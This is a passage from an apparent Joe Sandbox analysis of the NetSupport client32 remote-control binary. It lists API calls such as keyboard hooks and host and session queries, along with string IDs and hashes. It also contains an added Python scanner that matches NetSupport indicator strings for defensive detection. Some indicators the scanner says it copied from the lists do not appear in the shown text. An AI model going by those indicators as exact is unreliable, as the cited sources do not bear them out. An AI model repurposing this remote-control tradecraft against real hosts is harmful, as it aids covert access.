ok$gClient.hNotifyEvent$hClientRunning = %x, pid=%d (x%x)$istaService$istaUI$pcicl32$win8ui
                                                                                                                                                    • API String ID: 372548862-4025968211
                                                                                                                                                    • Opcode ID: b88d419bf3da3850df4f228622318878eddd1f0cdce54a214fe2f9a47240bf6f
                                                                                                                                                    • Instruction ID: 381c96219eccee67eae21d9e39560490d5bedbb063d23e5a2fc42920cd5923e4
                                                                                                                                                    • Opcode Fuzzy Hash: b88d419bf3da3850df4f228622318878eddd1f0cdce54a214fe2f9a47240bf6f
                                                                                                                                                    • Instruction Fuzzy Hash: 39F2F978E0226A9FE715CBA0CC94FADF7A5BB4870CF504468F925B72C8DB706940CB56

Control-flow Graph
• Function at 1102e0d0; the graph layout is not reproduced here. Imports reached on its paths: GetComputerNameA, LoadLibraryA, GetProcAddress, SetLastError, FreeLibrary, GetCurrentProcessId, wsprintfA, CharUpperA.
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
• Associated: 0000000A.00000002.2510574022.0000000011000000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522008878.00000000111F1000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.00000000111F7000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.000000001120B000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.000000001125D000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.0000000011288000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.000000001129E000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.00000000112AD000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.00000000112B4000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.00000000112DF000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.000000001132B000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_10_2_11000000_client32.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: _malloc_memsetwsprintf
                                                                                                                                                    • String ID: $$session$$%02d$%s.%02d$%session%$%sessionname%$18/11/16 11:28:14 V12.10F20$358075$Client$ClientName$DisableConsoleClient$Error x%x reading %s, sesh=%d$IsA()$ListenPort$MacAddress$NSM.LIC$NSMWClass$TCPIP$TSMode$Trying to get mac addr for %u.%u.%u.%u$WTSFreeMemory$WTSQuerySessionInformationA$Warning: Unexpanded clientname=<%s>$Wtsapi32.dll$client32$client32 dbi %hs$client32.ini$computername=%s, clientname=%s, tsmode=%d, vui=%d, vsvc=%d$e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h$multipoint=%d, softxpand=%d, pid=%d$screenscrape$ts macaddr=%s
                                                                                                                                                    • API String ID: 3802068140-3447039090
                                                                                                                                                    • Opcode ID: 5b056e33e84810f5b47047bfdd2e7b6d2b60f2191365f8a3aba671e699e49f35
                                                                                                                                                    • Instruction ID: ec88a390f79512b50aba7168cc31da78705c53b3cca2911266f0d70c00f4e6f9
                                                                                                                                                    • Opcode Fuzzy Hash: 5b056e33e84810f5b47047bfdd2e7b6d2b60f2191365f8a3aba671e699e49f35
                                                                                                                                                    • Instruction Fuzzy Hash: 8232B175D4127A9FDB22CF90CC84BEDB7B8BB44308F8445E9E559A7280EB706E84CB51

Control-flow Graph
• Function at 6ca93d00; the graph layout is not reproduced here. Imports and CRT calls reached on its paths: _memset, lstrlenA, _free, gethostname.
                                                                                                                                                    APIs
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000A.00000002.2531364826.000000006CA81000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6CA80000, based on PE: true
• Associated: 0000000A.00000002.2531301355.000000006CA80000.00000002.00000001.01000000.0000000D.sdmp
• Associated: 0000000A.00000002.2532853143.000000006CAC0000.00000002.00000001.01000000.0000000D.sdmp
• Associated: 0000000A.00000002.2533142363.000000006CAC9000.00000008.00000001.01000000.0000000D.sdmp
• Associated: 0000000A.00000002.2533215163.000000006CACA000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 0000000A.00000002.2533215163.000000006CACE000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 0000000A.00000002.2533383758.000000006CAD0000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_10_2_6ca80000_client32.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: _memset
                                                                                                                                                    • String ID: *Dept$*Gsk$1.1$358075$A1=%s$A2=%s$A3=%s$A4=%s$APPTYPE=%d$CHATID$CHATID=%s$CLIENT_ADDR=%s$CLIENT_NAME=%s$CLIENT_VERSION=1.0$CMD=OPEN$CMPI=%u$DEPT=%s$GSK=%s$HOSTNAME=%s$ListenPort$MAXPACKET=%d$PORT=%d$PROTOCOL_VER=%u.%u$Port$TCPIP$client247$connection_index == 0$e:\nsmsrc\nsm\1210\1210f\ctl32\htctl.c
                                                                                                                                                    • API String ID: 2102423945-705461076
                                                                                                                                                    • Opcode ID: 72327b98e1cfba3611f9f14ff40da23a170db099132e41daf5e4412042693630
                                                                                                                                                    • Instruction ID: 34beba2e2b51979f3aa8b190ae460c1672ea9abd41de1cd7d58ffbf651acdbda
                                                                                                                                                    • Opcode Fuzzy Hash: 72327b98e1cfba3611f9f14ff40da23a170db099132e41daf5e4412042693630
                                                                                                                                                    • Instruction Fuzzy Hash: 1EE183B291121CABDB24DB64CD81EEF77B8AF44205F0045D9E609A7A41DB349BCD8FB1
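The two String ID lists above (the client32 main routine at 1102e0d0, and the routine at 6ca93d00 whose assertion path names htctl.c and which assembles a CMD=OPEN request with CLIENT_ADDR, CLIENT_NAME, HOSTNAME and PROTOCOL_VER fields) together give a compact indicator set for the NetSupport client: configuration keys, licence file names, kernel-object names, request fields, a build path and version stamps. The Python below turns those strings into a scanner for a dropped file or an extracted memory region. It is an added example, not part of the Joe Sandbox report and not NetSupport's code; the indicator strings are copied from the lists above, the sample buffers are constructed, and the hit threshold is an arbitrary choice. One caveat: NetSupport Manager is a commercial remote-control product and these strings are present in legitimate installs too, so a match identifies the software, and the verdict has to come from how the client arrived on the host and who controls it.

```python
"""Scan a buffer (dropped file or memory-dump region) for the NetSupport
client32 strings listed in this report.

Added example, not part of the sandbox report. Indicator strings are taken
from the report's String ID lists; the sample regions below are constructed.
"""
import re
from typing import Dict, List

# Configuration keys, licence files and kernel-object names read or created
# by the client32 main routine (first String ID list).
CONFIG_INDICATORS: List[bytes] = [
    b"client32.ini", b"*ListenPort", b"*PriorityClass", b"*ScreenScrape",
    b"*StartupDelay", b"AlwaysOnTop", b"DisableConsoleClient",
    b"UseNTSecurity", b"NSM.LIC", b"NSA.LIC", b"IKS.LIC",
    b"Global\\NSMWClassAdmin", b"NSMWControl32",
]

# Fields of the CMD=OPEN request assembled in htctl.c (third String ID list).
# Prefixes are used so that both the format string in the image
# ("CLIENT_ADDR=%s") and an expanded copy in captured traffic match.
GATEWAY_INDICATORS: List[bytes] = [
    b"CMD=OPEN", b"CLIENT_VERSION=1.0", b"CLIENT_ADDR=", b"CLIENT_NAME=",
    b"HOSTNAME=", b"PROTOCOL_VER=", b"MAXPACKET=", b"client247",
]

# Build artefacts left in the binary: source path, source file, version stamp.
BUILD_INDICATORS: List[bytes] = [
    rb"e:\nsmsrc\nsm\1210\1210f\ctl32", b"CLIENT32.CPP", b"V12.10.20",
]

# Version stamps seen in the report: "V12.00.20", "V12.10.20", "V12.10F20".
VERSION_RE = re.compile(rb"V12\.\d{2}[.F]\d{2}")


def scan(buf: bytes) -> Dict[str, List[str]]:
    """Return, per category, the indicator strings present in buf."""
    groups = {
        "config": CONFIG_INDICATORS,
        "gateway": GATEWAY_INDICATORS,
        "build": BUILD_INDICATORS,
    }
    hits = {name: [s.decode("latin-1") for s in needles if s in buf]
            for name, needles in groups.items()}
    hits["version"] = sorted({m.decode() for m in VERSION_RE.findall(buf)})
    return hits


def is_netsupport_client(buf: bytes, min_config_hits: int = 3) -> bool:
    """Heuristic verdict: several configuration keys plus at least one build
    artefact or request field. The threshold is an arbitrary choice for this
    example. A True result identifies NetSupport client32 code or config,
    not intent; legitimate installs carry the same strings."""
    h = scan(buf)
    return len(h["config"]) >= min_config_hits and bool(h["build"] or h["gateway"])


# Constructed sample: a fragment resembling a memory-dump region of client32,
# padded with unrelated bytes. Not taken from the report.
SAMPLE_REGION = (
    b"\x00" * 16
    + b"client32.ini\x00*ListenPort\x00*StartupDelay\x00"
    b"AlwaysOnTop\x00NSM.LIC\x00Global\\NSMWClassAdmin\x00"
    + b"\x90" * 8
    + b"CMD=OPEN\x00CLIENT_VERSION=1.0\x00HOSTNAME=%s\x00"
    b"18/11/16 11:28:14 V12.10F20\x00"
    + b"\xcc" * 16
)

# Constructed benign control: an ordinary PE header fragment.
BENIGN_REGION = b"MZ\x90\x00" + b"This program cannot be run in DOS mode." + b"\x00" * 32


if __name__ == "__main__":
    for name, region in (("sample", SAMPLE_REGION), ("benign", BENIGN_REGION)):
        print(name, is_netsupport_client(region), scan(region))
```

Running the module prints the verdict and the per-category hits for both constructed regions. Point `scan` at the bytes of a dropped client32 binary or at a raw dump of the 11000000 and 6CA80000 regions referenced in the Memory Dump Source lines to compare against the report; the version regex is deliberately narrow to the 12.x stamps seen here and would need widening for other builds.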

Control-flow Graph
• Function at 11144140; the graph layout is not reproduced here. Imports reached on its paths are those listed under APIs below: GetModuleFileNameA, LoadLibraryA, GetModuleHandleA, GetProcAddress.
APIs
• GetModuleFileNameA.KERNEL32(00000000,?,00000104,00000000,8504C483,757323A0), ref: 11144173
• LoadLibraryA.KERNEL32(?), ref: 111441BC
• LoadLibraryA.KERNEL32(DBGHELP.DLL), ref: 111441D5
• LoadLibraryA.KERNEL32(IMAGEHLP.DLL), ref: 111441E4
• GetModuleHandleA.KERNEL32(?), ref: 111441EA
• GetProcAddress.KERNEL32(00000000,SymGetLineFromAddr), ref: 111441FE
• GetProcAddress.KERNEL32(00000000,SymGetLineFromName), ref: 1114421D
• GetProcAddress.KERNEL32(00000000,SymGetLineNext), ref: 11144228
• GetProcAddress.KERNEL32(00000000,SymGetLinePrev), ref: 11144233
• GetProcAddress.KERNEL32(00000000,SymMatchFileName), ref: 1114423E
• GetProcAddress.KERNEL32(00000000,StackWalk), ref: 11144249
• GetProcAddress.KERNEL32(00000000,SymCleanup), ref: 11144254
• GetProcAddress.KERNEL32(00000000,SymLoadModule), ref: 1114425F
• GetProcAddress.KERNEL32(00000000,SymInitialize), ref: 1114426A
• GetProcAddress.KERNEL32(00000000,SymGetOptions), ref: 11144275
• GetProcAddress.KERNEL32(00000000,SymSetOptions), ref: 11144280
• GetProcAddress.KERNEL32(00000000,SymGetModuleInfo), ref: 1114428B
• GetProcAddress.KERNEL32(00000000,SymGetSymFromAddr), ref: 11144296
• GetProcAddress.KERNEL32(00000000,SymFunctionTableAccess), ref: 111442A1
• GetProcAddress.KERNEL32(00000000,MiniDumpWriteDump), ref: 111442AC
  • Part of subcall function 11081E00: _strrchr.LIBCMT ref: 11081E0E
Strings
Memory Dump Source
• Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
• Associated: 0000000A.00000002.2510574022.0000000011000000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522008878.00000000111F1000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.00000000111F7000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.000000001120B000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.000000001125D000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.0000000011288000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.000000001129E000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.00000000112AD000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.00000000112B4000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.00000000112DF000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.000000001132B000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_11000000_client32.jbxd
Yara matches
Similarity
• API ID: AddressProc$LibraryLoad$Module$FileHandleName_strrchr
• String ID: DBGHELP.DLL$IMAGEHLP.DLL$MiniDumpWriteDump$StackWalk$SymCleanup$SymFunctionTableAccess$SymGetLineFromAddr$SymGetLineFromName$SymGetLineNext$SymGetLinePrev$SymGetModuleInfo$SymGetOptions$SymGetSymFromAddr$SymInitialize$SymLoadModule$SymMatchFileName$SymSetOptions$dbghelp.dll
• API String ID: 3874234733-2061581830
• Opcode ID: 57b4066cb2a569ca058a5d5f8073bc193ef12f36e95607c0665d50404da9b0c4
• Instruction ID: c7cebb5ad097969c59afa36c8b157edb2e0deacaa1fcee2d42955e2ce7c14d1b
• Opcode Fuzzy Hash: 57b4066cb2a569ca058a5d5f8073bc193ef12f36e95607c0665d50404da9b0c4
• Instruction Fuzzy Hash: 74416174A40704AFDB289F769D84E6BFBF8FF55B18B50492EE445D3A00EB74E8008B59

Control-flow Graph
(rendered graph omitted; basic blocks 110aa170-110aa432)
APIs
• LoadLibraryA.KERNEL32(setupapi.dll,1EF76653,00000000,00000000,?,?,?,?,?,?,?,?,?,?,00000000,111856D8), ref: 110AA1A3
• GetProcAddress.KERNEL32(00000000,SetupDiGetClassDevsA), ref: 110AA1C7
• SetupDiGetClassDevsA.SETUPAPI(111A7EDC,00000000,00000000,00000012,?,?,?,?,?,?,?,?,?,00000000,111856D8,000000FF), ref: 110AA1E1
• GetProcAddress.KERNEL32(00000000,SetupDiEnumDeviceInterfaces), ref: 110AA20C
• _free.LIBCMT ref: 110AA240
• GetProcAddress.KERNEL32(00000000,SetupDiGetDeviceInterfaceDetailA), ref: 110AA252
• GetLastError.KERNEL32 ref: 110AA27D
• _malloc.LIBCMT ref: 110AA293
• GetProcAddress.KERNEL32(00000000,SetupDiGetDeviceInterfaceDetailA), ref: 110AA2B5
• SetLastError.KERNEL32(00000078,?,?,?,?,?,?,?,?,?,00000000,111856D8,000000FF,?,1102F855,Client), ref: 110AA2E7
• SetLastError.KERNEL32(00000078), ref: 110AA2FB
• GetLastError.KERNEL32 ref: 110AA301
• _free.LIBCMT ref: 110AA313
• SetLastError.KERNEL32(00000078), ref: 110AA324
• SetLastError.KERNEL32(00000078), ref: 110AA331
• _free.LIBCMT ref: 110AA344
• FreeLibrary.KERNEL32(?,?), ref: 110AA354
• FreeLibrary.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,00000000,111856D8,000000FF,?,1102F855,Client), ref: 110AA3F8
Strings
Memory Dump Source
• Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
• Associated: 0000000A.00000002.2510574022.0000000011000000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522008878.00000000111F1000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.00000000111F7000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.000000001120B000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.000000001125D000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.0000000011288000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.000000001129E000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.00000000112AD000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.00000000112B4000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.00000000112DF000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.000000001132B000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_11000000_client32.jbxd
Yara matches
Similarity
• API ID: ErrorLast$AddressProc$Library_free$Free$ClassDevsLoadSetup_malloc
• String ID: SetupDiDestroyDeviceInfoList$SetupDiEnumDeviceInterfaces$SetupDiGetClassDevsA$SetupDiGetDeviceInterfaceDetailA$setupapi.dll
• API String ID: 3464732724-3340099623
• Opcode ID: dbc8acc033e5e24f37873c07638d6d638064cee8c874e7b38a73b383613d7029
• Instruction ID: 5c4fa76f58df98f84a8804f3b2f927c1121c913996f050c4ed1f836ab53a5840
• Opcode Fuzzy Hash: dbc8acc033e5e24f37873c07638d6d638064cee8c874e7b38a73b383613d7029
• Instruction Fuzzy Hash: CE818472D40219EBEB04DFE4ED88F9EBBB8AF44704F104528F922A76C4DB759945CB50

Control-flow Graph
(rendered graph omitted; basic blocks 1102e190-1102ea08)
                                                                                                                                                    APIs
                                                                                                                                                    • LoadLibraryA.KERNEL32(Wtsapi32.dll,Client,screenscrape,00000001,00000003,TCPIP,ListenPort,00000000,00000003,00000003,?,?,?,?,?,?), ref: 1102E501
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                    • Associated: 0000000A.00000002.2510574022.0000000011000000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                    • Associated: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                    • Associated: 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                    • Associated: 0000000A.00000002.2522008878.00000000111F1000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000111F7000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001120B000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001125D000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.0000000011288000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001129E000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112AD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112B4000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112DF000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001132B000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_10_2_11000000_client32.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: LibraryLoad
                                                                                                                                                    • String ID: $18/11/16 11:28:14 V12.10F20$358075$Client$ClientName$DisableConsoleClient$Error x%x reading %s, sesh=%d$ListenPort$MacAddress$TCPIP$TSMode$Trying to get mac addr for %u.%u.%u.%u$WTSFreeMemory$WTSQuerySessionInformationA$Wtsapi32.dll$client32 dbi %hs$client32.ini$computername=%s, clientname=%s, tsmode=%d, vui=%d, vsvc=%d$multipoint=%d, softxpand=%d, pid=%d$screenscrape$ts macaddr=%s
                                                                                                                                                    • API String ID: 1029625771-4035218665
                                                                                                                                                    • Opcode ID: 4844477a3dfa00db22a4a3eae4f5fa09477cc507549c10b77b16c479c19a4a69
                                                                                                                                                    • Instruction ID: db6713792a15d7fd58b1be38af693bfb3b21aad0558d55bfb54ca6815a31c46c
                                                                                                                                                    • Opcode Fuzzy Hash: 4844477a3dfa00db22a4a3eae4f5fa09477cc507549c10b77b16c479c19a4a69
                                                                                                                                                    • Instruction Fuzzy Hash: B1C1EF75E4127A9BEB22CF918C94FEDF7B9BB48308F8044E9E559A7240D6706E80CB51

                                                                                                                                                    Control-flow Graph

                                                                                                                                                    control_flow_graph 2614 11142010-11142051 call 11147060 2617 11142057-111420b3 LoadLibraryA 2614->2617 2618 111420d9-11142103 call 11143a50 call 11147af0 LoadLibraryA 2614->2618 2620 111420b5-111420c0 call 11017a40 2617->2620 2621 111420c7-111420d0 2617->2621 2630 11142105-1114210b 2618->2630 2631 11142133 2618->2631 2620->2621 2627 111420c2 call 110ccc90 2620->2627 2621->2618 2623 111420d2-111420d3 FreeLibrary 2621->2623 2623->2618 2627->2621 2630->2631 2633 1114210d-11142113 2630->2633 2632 1114213d-1114215d GetClassInfoExA 2631->2632 2634 11142163-1114218a call 11162be0 call 11145080 2632->2634 2635 111421fe-11142256 2632->2635 2633->2631 2636 11142115-11142131 call 1105e820 2633->2636 2645 111421a3-111421e5 call 11145080 call 111450b0 LoadCursorA GetStockObject RegisterClassExA 2634->2645 2646 1114218c-111421a0 call 11029a70 2634->2646 2647 11142292-11142298 2635->2647 2648 11142258-1114225e 2635->2648 2636->2632 2645->2635 2673 111421e7-111421fb call 11029a70 2645->2673 2646->2645 2652 111422d4-111422f6 call 1105e820 2647->2652 2653 1114229a-111422a9 call 111101b0 2647->2653 2648->2647 2650 11142260-11142266 2648->2650 2650->2647 2656 11142268-1114227f call 1112d770 LoadLibraryA 2650->2656 2665 11142304-11142309 2652->2665 2666 111422f8-11142302 2652->2666 2663 111422cd 2653->2663 2664 111422ab-111422cb 2653->2664 2656->2647 2672 11142281-1114228d GetProcAddress 2656->2672 2669 111422cf 2663->2669 2664->2669 2670 11142315-1114231b 2665->2670 2671 1114230b 2665->2671 2666->2670 2669->2652 2675 1114231d-11142323 call 110f8230 2670->2675 2676 11142328-11142341 call 1113d9a0 2670->2676 2671->2670 2672->2647 2673->2635 2675->2676 2682 11142347-1114234d 2676->2682 2683 111423e9-111423fa 2676->2683 2684 1114234f-11142361 call 111101b0 2682->2684 2685 11142389-1114238f 2682->2685 2695 11142363-11142379 call 1115e590 2684->2695 2696 1114237b 2684->2696 2687 111423b5-111423c1 2685->2687 2688 11142391-11142397 2685->2688 2689 111423c3-111423c9 2687->2689 2690 111423d8-111423e3 #17 LoadLibraryA 2687->2690 2692 1114239e-111423b0 SetTimer 2688->2692 2693 11142399 call 11135840 2688->2693 2689->2690 2694 111423cb-111423d1 2689->2694 2690->2683 2692->2687 2693->2692 2694->2690 2698 111423d3 call 1112e5e0 2694->2698 2700 1114237d-11142384 2695->2700 2696->2700 2698->2690 2700->2685
                                                                                                                                                    APIs
                                                                                                                                                    • LoadLibraryA.KERNEL32(User32.dll,00000000,?), ref: 11142063
                                                                                                                                                    • FreeLibrary.KERNEL32(00000000), ref: 111420D3
                                                                                                                                                    • LoadLibraryA.KERNEL32(imm32,?,?,00000000,?), ref: 111420F6
                                                                                                                                                    • GetClassInfoExA.USER32(11000000,NSMWClass,?), ref: 11142155
                                                                                                                                                    • _memset.LIBCMT ref: 11142169
                                                                                                                                                    • LoadCursorA.USER32(00000000,00007F00), ref: 111421B9
                                                                                                                                                    • GetStockObject.GDI32(00000000), ref: 111421C3
                                                                                                                                                    • RegisterClassExA.USER32(?), ref: 111421DA
                                                                                                                                                    • LoadLibraryA.KERNEL32(pcihooks,?,?,00000000,?), ref: 11142272
                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,HookKeyboard), ref: 11142287
                                                                                                                                                    • SetTimer.USER32(00000000,00000000,000003E8,1113D980), ref: 111423AA
                                                                                                                                                    • #17.COMCTL32(?,?,?,00000000,?), ref: 111423D8
                                                                                                                                                    • LoadLibraryA.KERNEL32(riched32.dll,?,?,?,00000000,?), ref: 111423E3
                                                                                                                                                      • Part of subcall function 11017A40: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,1EF76653,11030346,00000000), ref: 11017A6E
                                                                                                                                                      • Part of subcall function 11017A40: LoadLibraryA.KERNEL32(Kernel32.dll), ref: 11017A7E
                                                                                                                                                      • Part of subcall function 11017A40: GetProcAddress.KERNEL32(00000000,QueueUserWorkItem), ref: 11017AC2
                                                                                                                                                      • Part of subcall function 11017A40: FreeLibrary.KERNEL32(00000000), ref: 11017AE8
                                                                                                                                                      • Part of subcall function 110CCC90: CreateWindowExA.USER32(00000000,button,11195264,00000000,00000000,00000000,00000020,00000020,00000000,00000000,00000000,00000000), ref: 110CCCC9
                                                                                                                                                      • Part of subcall function 110CCC90: SetClassLongA.USER32(00000000,000000E8,110CCA10), ref: 110CCCE0
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                    • Associated: 0000000A.00000002.2510574022.0000000011000000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                    • Associated: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                    • Associated: 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                    • Associated: 0000000A.00000002.2522008878.00000000111F1000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000111F7000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001120B000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001125D000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.0000000011288000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001129E000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112AD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112B4000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112DF000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001132B000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_10_2_11000000_client32.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Library$Load$Class$AddressCreateFreeProc$CursorEventInfoLongObjectRegisterStockTimerWindow_memset
                                                                                                                                                    • String ID: *quiet$HookKeyboard$InitUI (%d)$NSMGetAppIcon()$NSMWClass$TraceCopyData$UI.CPP$User32.dll$View$_License$_debug$imm32$pcihooks$riched32.dll
                                                                                                                                                    • API String ID: 3706574701-3145203681
                                                                                                                                                    • Opcode ID: c8cd067e95ed8df30712ab26ad1b5c3d5f0c1ca3db4a3fb2271c70030aa03097
                                                                                                                                                    • Instruction ID: dd3f645cf5ef2db3b7f5f54c26e54504db449fd0c20b07bc67f1527c65be20eb
                                                                                                                                                    • Opcode Fuzzy Hash: c8cd067e95ed8df30712ab26ad1b5c3d5f0c1ca3db4a3fb2271c70030aa03097
                                                                                                                                                    • Instruction Fuzzy Hash: F8A18CB8E02266DFDB01DFE5D9C4AA9FBB4BB0870CF60453EE125A7648E7305484CB55

                                                                                                                                                    Control-flow Graph

